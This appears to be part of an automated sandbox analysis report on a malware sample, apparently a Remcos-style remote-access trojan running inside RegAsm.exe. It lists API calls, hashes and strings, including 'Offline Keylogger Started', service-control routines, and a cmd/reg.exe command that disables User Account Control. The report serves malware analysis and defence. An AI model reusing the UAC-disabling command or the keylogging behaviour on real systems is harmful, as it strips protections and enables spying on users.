                                                                    • Part of subcall function 00412077: GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00411F37,?,?,?,?,?), ref: 004120E7
                                                                    • Part of subcall function 00412077: HeapFree.KERNEL32(00000000), ref: 004120EE
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.873315783.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: ErrorHeapLast$AllocProcess$FreeInfoNativeSystemVirtual
                                                                  • String ID:
                                                                  • API String ID: 3950776272-0
                                                                  • Opcode ID: 03879881e365d714915aafd98c27fc7559b9a312a1bd96baf04abeae924ccd8f
                                                                  • Instruction ID: a5564978de1508fcfe39aaa31f5973b4ee53e0220ffe5d2cf9b9f7f7cc9a58c7
                                                                  • Opcode Fuzzy Hash: 03879881e365d714915aafd98c27fc7559b9a312a1bd96baf04abeae924ccd8f
                                                                  • Instruction Fuzzy Hash: B661E370601201ABC7109F66C980BAB7BA5BF44744F04411BFA058B7A2E7BCE8D2CBD9
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.873315783.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: __cftoe
                                                                  • String ID:
                                                                  • API String ID: 4189289331-0
                                                                  • Opcode ID: eef5811f0b3e11eaf1bdde4175ac7a9ebfa2f3cd5d18ba66a6432d1456243127
                                                                  • Instruction ID: 6c78d09a6f5169ef6f707262af513c71f712f2c279f5202ad8aecd4a6012115a
                                                                  • Opcode Fuzzy Hash: eef5811f0b3e11eaf1bdde4175ac7a9ebfa2f3cd5d18ba66a6432d1456243127
                                                                  • Instruction Fuzzy Hash: D951EA72900A05ABFF209B59CC81FAF77A9EF49334F14421FF515A6293DB39D900866C
                                                                  APIs
                                                                  • OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,00000000,?,?,?,0041A38E,00000000), ref: 0041AC88
                                                                  • OpenServiceW.ADVAPI32(00000000,00000000,00000002,?,?,?,0041A38E,00000000), ref: 0041AC9C
                                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A38E,00000000), ref: 0041ACA9
                                                                  • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,0041A38E,00000000), ref: 0041ACDE
                                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A38E,00000000), ref: 0041ACF0
                                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A38E,00000000), ref: 0041ACF3
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.873315783.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Service$CloseHandle$Open$ChangeConfigManager
                                                                  • String ID:
                                                                  • API String ID: 493672254-0
                                                                  • Opcode ID: efec56fc5935d5a2572c80bdc1daad9799237a8c2fd258714d4154745ff5c6c1
                                                                  • Instruction ID: ed0bae8235b77a8e2b5b4951a925fd67a34dfbd091713fce30693036f81a5133
                                                                  • Opcode Fuzzy Hash: efec56fc5935d5a2572c80bdc1daad9799237a8c2fd258714d4154745ff5c6c1
                                                                  • Instruction Fuzzy Hash: 84014E311452147BD6110B385C4DEFB3B5CDB42771F100317F925922D1EA68CD45B5EE
                                                                  APIs
                                                                  • GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                                                                  • _free.LIBCMT ref: 0044824C
                                                                  • _free.LIBCMT ref: 00448274
                                                                  • SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 00448281
                                                                  • SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                                                                  • _abort.LIBCMT ref: 00448293
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.873315783.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: ErrorLast$_free$_abort
                                                                  • String ID:
                                                                  • API String ID: 3160817290-0
                                                                  • Opcode ID: d577d612c1ffbc00090520c66a2c794f4cb9603406b177c38f93d9dbc2276fca
                                                                  • Instruction ID: 1e51d54565af68f960eede883612623578b8b4ccb82fc25c91f14e3db4823c68
                                                                  • Opcode Fuzzy Hash: d577d612c1ffbc00090520c66a2c794f4cb9603406b177c38f93d9dbc2276fca
                                                                  • Instruction Fuzzy Hash: 15F0F935104F006AF611332A6C05B5F2515ABC276AF25066FF92892292DFACCC4581AD
                                                                  APIs
                                                                  • OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,00000001,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAB5
                                                                  • OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAC9
                                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAD6
                                                                  • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAE5
                                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAF7
                                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAFA
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.873315783.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Service$CloseHandle$Open$ControlManager
                                                                  • String ID:
                                                                  • API String ID: 221034970-0
                                                                  • Opcode ID: 4ae3873c1f536b49cfb6b65ca2e5a3703e9976f2291b0d96870e63be56c21842
                                                                  • Instruction ID: 651adf303b3d55a6ad93a9774d9c6d096703db2647e4265c62a250da7e042a32
                                                                  • Opcode Fuzzy Hash: 4ae3873c1f536b49cfb6b65ca2e5a3703e9976f2291b0d96870e63be56c21842
                                                                  • Instruction Fuzzy Hash: 68F0C231541218ABD711AF25AC49EFF3B6CDF45BA2F000026FE0992192DB68CD4695E9
                                                                  APIs
                                                                  • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABB9
                                                                  • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABCD
                                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABDA
                                                                  • ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABE9
                                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABFB
                                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABFE
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.873315783.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Service$CloseHandle$Open$ControlManager
                                                                  • String ID:
                                                                  • API String ID: 221034970-0
                                                                  • Opcode ID: 81e2b4606ab98421978dc9842ef1edfa46dc1b90a9204ca08327dde20b0592b6
                                                                  • Instruction ID: cdcae22f94af1ce7d279f83afe572816001e75aa845eac4345c2c81124f82824
                                                                  • Opcode Fuzzy Hash: 81e2b4606ab98421978dc9842ef1edfa46dc1b90a9204ca08327dde20b0592b6
                                                                  • Instruction Fuzzy Hash: 84F0C231501218ABD6116F259C49DFF3B6CDB45B62F40002AFE0996192EB38DD4595F9
                                                                  APIs
                                                                  • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC20
                                                                  • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC34
                                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC41
                                                                  • ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC50
                                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC62
                                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC65
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.873315783.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Service$CloseHandle$Open$ControlManager
                                                                  • String ID:
                                                                  • API String ID: 221034970-0
                                                                  • Opcode ID: fc89c5385e453168767847f65058b20f434ef67782af095c3a641765214ec1d0
                                                                  • Instruction ID: 1af6be829003de2eeb85b71d4b0cbdb2c911632148e7083bdbbda8586ff13133
                                                                  • Opcode Fuzzy Hash: fc89c5385e453168767847f65058b20f434ef67782af095c3a641765214ec1d0
                                                                  • Instruction Fuzzy Hash: 2FF0F631501228BBD711AF25EC49DFF3B6CDB45B62F00002AFE0992192EB38CD4595F9
                                                                  APIs
                                                                  • GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 0040B172
                                                                  • wsprintfW.USER32 ref: 0040B1F3
                                                                    • Part of subcall function 0040A636: SetEvent.KERNEL32(?,?,00000000,0040B20A,00000000), ref: 0040A662
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.873315783.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: EventLocalTimewsprintf
                                                                  • String ID: [%04i/%02i/%02i %02i:%02i:%02i $Offline Keylogger Started$]
                                                                  • API String ID: 1497725170-248792730
                                                                  • Opcode ID: 65b46232fdee2079f17a48eaa96158f2453b4876d4296abcf31ffc0408f1bd52
                                                                  • Instruction ID: 81b60f5d3581edaaac31e3e44e1e4f5c322996b2d8bf5e7d6f89c643b346fb92
                                                                  • Opcode Fuzzy Hash: 65b46232fdee2079f17a48eaa96158f2453b4876d4296abcf31ffc0408f1bd52
                                                                  • Instruction Fuzzy Hash: 82117F72504118AACB18AB96EC558FE77BCEE48315B00012FF506A60E1FF7C9E46C6AC
                                                                  APIs
                                                                  • CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000), ref: 0040A6AB
                                                                  • GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040A74D), ref: 0040A6BA
                                                                  • Sleep.KERNEL32(00002710,?,?,?,0040A74D), ref: 0040A6E7
                                                                  • CloseHandle.KERNEL32(00000000), ref: 0040A6EE
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.873315783.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: File$CloseCreateHandleSizeSleep
                                                                  • String ID: XQG
                                                                  • API String ID: 1958988193-3606453820
                                                                  • Opcode ID: a936430ac144879a830ace31701bfe89764f94ae4ec5835598aad753144bf191
                                                                  • Instruction ID: 2d5b847f40b6dc6d65e682cb961bc0859910b41d7418e35cc132b68a4a9af338
                                                                  • Opcode Fuzzy Hash: a936430ac144879a830ace31701bfe89764f94ae4ec5835598aad753144bf191
                                                                  • Instruction Fuzzy Hash: AD112B30600740EEE631A7249895A5F3B6AEB41356F48083AF2C26B6D2C6799CA0C35E
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.873315783.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: ClassCreateErrorLastRegisterWindow
                                                                  • String ID: 0$MsgWindowClass
                                                                  • API String ID: 2877667751-2410386613
                                                                  • Opcode ID: a7bf03488480a67a5ab74e572dd3e9b3283d69d087452f3b28ffeaf09d6b5029
                                                                  • Instruction ID: 921741f364e14ac5d494c0d6481b3569f22aad0bbfd2e997b493b5423d792a6e
                                                                  • Opcode Fuzzy Hash: a7bf03488480a67a5ab74e572dd3e9b3283d69d087452f3b28ffeaf09d6b5029
                                                                  • Instruction Fuzzy Hash: 910129B1D00219BBDB00DFD5ECC49EFBBBDEA04355F40053AF900A6240E77859058AA4
                                                                  APIs
                                                                  • CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 0040779B
                                                                  • CloseHandle.KERNEL32(?), ref: 004077AA
                                                                  • CloseHandle.KERNEL32(?), ref: 004077AF
                                                                  Strings
                                                                  • C:\Windows\System32\cmd.exe, xrefs: 00407796
                                                                  • /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 00407791
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.873315783.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: CloseHandle$CreateProcess
                                                                  • String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe
                                                                  • API String ID: 2922976086-4183131282
                                                                  • Opcode ID: 86afbde76f2a9426f4ed7e8e7c7881cd7a3c7ba11745d0fd7a0dc136aa7099f4
                                                                  • Instruction ID: bcd6b2dc2297655d1c2a6c7a9d844aadd79638dc8707381bf3a952a3ff6736b4
                                                                  • Opcode Fuzzy Hash: 86afbde76f2a9426f4ed7e8e7c7881cd7a3c7ba11745d0fd7a0dc136aa7099f4
                                                                  • Instruction Fuzzy Hash: BCF03676D4029D76CB20ABD6DC0EEDF7F7DEBC5B11F00056AF904A6141E6746404C6B9
                                                                  Strings
                                                                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, xrefs: 004076C4
                                                                  • SG, xrefs: 004076DA
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.873315783.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: SG$C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                  • API String ID: 0-643455097
                                                                  • Opcode ID: a5e5064d23fdb4a5105bb888b891a2001f99cf11455aefb2b8df45e89f9c3324
                                                                  • Instruction ID: 1b954d03a55cc3c1a25a26db856d3c6076ddce7f3b9fad0ad77fefb3a3407f05
                                                                  • Opcode Fuzzy Hash: a5e5064d23fdb4a5105bb888b891a2001f99cf11455aefb2b8df45e89f9c3324
                                                                  • Instruction Fuzzy Hash: 2CF046B0F14A00EBCB0467655D186693A05A740356F404C77F907EA2F2EBBD5C41C61E
                                                                  APIs
                                                                  • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,004432EB,?,?,0044328B,?), ref: 0044335A
                                                                  • GetProcAddress.KERNEL32(00000000,CorExitProcess,?,?,?,?,004432EB,?,?,0044328B,?), ref: 0044336D
                                                                  • FreeLibrary.KERNEL32(00000000,?,?,?,004432EB,?,?,0044328B,?), ref: 00443390
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.873315783.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: AddressFreeHandleLibraryModuleProc
                                                                  • String ID: CorExitProcess$mscoree.dll
                                                                  • API String ID: 4061214504-1276376045
                                                                  • Opcode ID: cc52f7ac488aa55dad4b7db89aaf695af0dd1fe717ea7d7a85019ca2162c21c0
                                                                  • Instruction ID: b4f1316bd170a33105784e50650a9bde6d9e9410588fddf83d5a1a7bf10dc45d
                                                                  • Opcode Fuzzy Hash: cc52f7ac488aa55dad4b7db89aaf695af0dd1fe717ea7d7a85019ca2162c21c0
                                                                  • Instruction Fuzzy Hash: 6AF0A430A00208FBDB149F55DC09B9EBFB4EF04713F0041A9FC05A2261CB349E40CA98
                                                                  APIs
                                                                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00405120
                                                                  • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00404E7A,00000001), ref: 0040512C
                                                                  • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,00404E7A,00000001), ref: 00405137
                                                                  • CloseHandle.KERNEL32(?), ref: 00405140
                                                                    • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.873315783.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
                                                                  • String ID: KeepAlive | Disabled
                                                                  • API String ID: 2993684571-305739064
                                                                  • Opcode ID: 11e320f67abdd95442ebe69be37ae07741154b3609cf10b7525108ad99fbffe3
                                                                  • Instruction ID: c1447ea2195e795a2fa4d382ed9a15925dec3dc8ccf256ab7d783030aa8980db
                                                                  • Opcode Fuzzy Hash: 11e320f67abdd95442ebe69be37ae07741154b3609cf10b7525108ad99fbffe3
                                                                  • Instruction Fuzzy Hash: 4CF06271904711BBDB103B758D0A66B7A54AB02311F0009BEF982916E2D6798840CF9A
                                                                  APIs
                                                                    • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                                                  • GetModuleHandleA.KERNEL32(00000000,00020009), ref: 0041ADF2
                                                                  • PlaySoundW.WINMM(00000000,00000000), ref: 0041AE00
                                                                  • Sleep.KERNEL32(00002710), ref: 0041AE07
                                                                  • PlaySoundW.WINMM(00000000,00000000,00000000), ref: 0041AE10
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.873315783.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: PlaySound$HandleLocalModuleSleepTime
                                                                  • String ID: Alarm triggered
                                                                  • API String ID: 614609389-2816303416
                                                                  • Opcode ID: 458a9fadc2ddf1b51f38526f332080559b1bee2397fd5821544ba6e308cf5034
                                                                  • Instruction ID: 9c0713ce1321a11b0f254193fe9a85ef30a97b7eb59a64372af151f10574a600
                                                                  • Opcode Fuzzy Hash: 458a9fadc2ddf1b51f38526f332080559b1bee2397fd5821544ba6e308cf5034
                                                                  • Instruction Fuzzy Hash: 36E01226B44260779620377B6D4FD6F3D28DAC2B5170100BEFA0666192D9580C4586FB
                                                                  APIs
                                                                  • GetStdHandle.KERNEL32(000000F5,00000000,?,?,?,?,?,?,0041CDED), ref: 0041CD62
                                                                  • GetConsoleScreenBufferInfo.KERNEL32 ref: 0041CD6F
                                                                  • SetConsoleTextAttribute.KERNEL32(00000000,0000000C), ref: 0041CD7C
                                                                  • SetConsoleTextAttribute.KERNEL32(00000000,?), ref: 0041CD8F
                                                                  Strings
                                                                  • ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/ , xrefs: 0041CD82
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.873315783.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Console$AttributeText$BufferHandleInfoScreen
                                                                  • String ID: ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/
                                                                  • API String ID: 3024135584-2418719853
                                                                  • Opcode ID: 7fe6fe9ce11b1ae804115fcba13355f31785efbed8ffac05f5782df1f2ab6211
                                                                  • Instruction ID: 0b88db63cd78dea0703aeaf814a7171c31f7e2e6e0b1944ffb711cb25cf7542c
                                                                  • Opcode Fuzzy Hash: 7fe6fe9ce11b1ae804115fcba13355f31785efbed8ffac05f5782df1f2ab6211
                                                                  • Instruction Fuzzy Hash: B4E04872904315E7E31027B5EC4DDAB7B7CE745713B100266FA12915D39A749C40C6B5
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.873315783.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: d82b14c4b7eddcab2a525b8a5736e815382cccc6b286473e45e20a4a09cb7dcc
                                                                  • Instruction ID: 3288ceb70b28299b768e57bc56a65f905b411dc47ae91625c595fe6b39b3afde
                                                                  • Opcode Fuzzy Hash: d82b14c4b7eddcab2a525b8a5736e815382cccc6b286473e45e20a4a09cb7dcc
                                                                  • Instruction Fuzzy Hash: 4D71C431900256ABEF21CF55C884AFFBBB5EF95350F14012BE812A72A1D7748CC1CBA9
                                                                  APIs
                                                                    • Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,0043529C,?,?,00438847,?,?,00000000,?,?,0040DE62,0043529C,?,?,?,?), ref: 00446169
                                                                  • _free.LIBCMT ref: 00444E06
                                                                  • _free.LIBCMT ref: 00444E1D
                                                                  • _free.LIBCMT ref: 00444E3C
                                                                  • _free.LIBCMT ref: 00444E57
                                                                  • _free.LIBCMT ref: 00444E6E
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.873315783.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: _free$AllocateHeap
                                                                  • String ID:
                                                                  • API String ID: 3033488037-0
                                                                  • Opcode ID: 40f9e7cc2be6d4603e073625857eb528f872492eb2fa809e82d56bfb9c8f3841
                                                                  • Instruction ID: 75a60bec03265776b93b53542ea819fdab521e44af267d44e1f719a945e8e2e2
                                                                  • Opcode Fuzzy Hash: 40f9e7cc2be6d4603e073625857eb528f872492eb2fa809e82d56bfb9c8f3841
                                                                  • Instruction Fuzzy Hash: 5451D371A00704AFEB20DF6AC841B6673F4FF85729B14456EE819D7250E739EE01CB88
                                                                  APIs
                                                                  • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045F234), ref: 004493CF
                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00472764,000000FF,00000000,0000003F,00000000,?,?), ref: 00449447
                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,004727B8,000000FF,?,0000003F,00000000,?), ref: 00449474
                                                                  • _free.LIBCMT ref: 004493BD
                                                                    • Part of subcall function 00446782: HeapFree.KERNEL32(00000000,00000000), ref: 00446798
                                                                    • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                                                                  • _free.LIBCMT ref: 00449589
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.873315783.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
                                                                  • String ID:
                                                                  • API String ID: 1286116820-0
                                                                  • Opcode ID: 0a3c6fbe7e5a1f133d1032b40f823fca6b3dff27f0c0d46b4efcd8c71cfe77a6
                                                                  • Instruction ID: c95a83c4fc9d8f5f381c6ef12c4bd90d50aad01b0883e3b7d6e96279f2ead045
                                                                  • Opcode Fuzzy Hash: 0a3c6fbe7e5a1f133d1032b40f823fca6b3dff27f0c0d46b4efcd8c71cfe77a6
                                                                  • Instruction Fuzzy Hash: 71511A71904205EBEB14EFA9DD819AFB7BCEF44324F10066FE51493291EB788E42DB58
                                                                  APIs
                                                                    • Part of subcall function 0041BFB7: GetCurrentProcess.KERNEL32(?,?,?,0040DAAA,WinDir,00000000,00000000), ref: 0041BFC8
                                                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040F91B
                                                                  • Process32FirstW.KERNEL32(00000000,?), ref: 0040F93F
                                                                  • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040F94E
                                                                  • CloseHandle.KERNEL32(00000000), ref: 0040FB05
                                                                    • Part of subcall function 0041BFE5: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,0040F5F9,00000000,?,?,00475338), ref: 0041BFFA
                                                                    • Part of subcall function 0041C1DD: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C1F5
                                                                    • Part of subcall function 0041C1DD: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C208
                                                                  • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040FAF6
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.873315783.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Process$OpenProcess32$Next$CloseCreateCurrentFirstHandleSnapshotToolhelp32
                                                                  • String ID:
                                                                  • API String ID: 4269425633-0
                                                                  • Opcode ID: 6f51e59ffccac79a8cfa31e78c91a9a185d84b91a830793d1a1b18643491f6ec
                                                                  • Instruction ID: d179df5438ecf7187d550cf9263b6860c2801d48d571b2859f9d543a591e132f
                                                                  • Opcode Fuzzy Hash: 6f51e59ffccac79a8cfa31e78c91a9a185d84b91a830793d1a1b18643491f6ec
                                                                  • Instruction Fuzzy Hash: 784116311083419BC325F722DC55AEFB3A5AF94345F50493EF48A921E2EF385A49C75A
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.873315783.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: _free
                                                                  • String ID:
                                                                  • API String ID: 269201875-0
                                                                  • Opcode ID: f0d0e5395ad938097262dc5d88931f0578874cbbbca0d0094bbf983591b431c8
                                                                  • Instruction ID: 5dce3a056f7b38871bf3701478ebec2c01ef4ac0d1e4adeac0a27022f106ca0c
                                                                  • Opcode Fuzzy Hash: f0d0e5395ad938097262dc5d88931f0578874cbbbca0d0094bbf983591b431c8
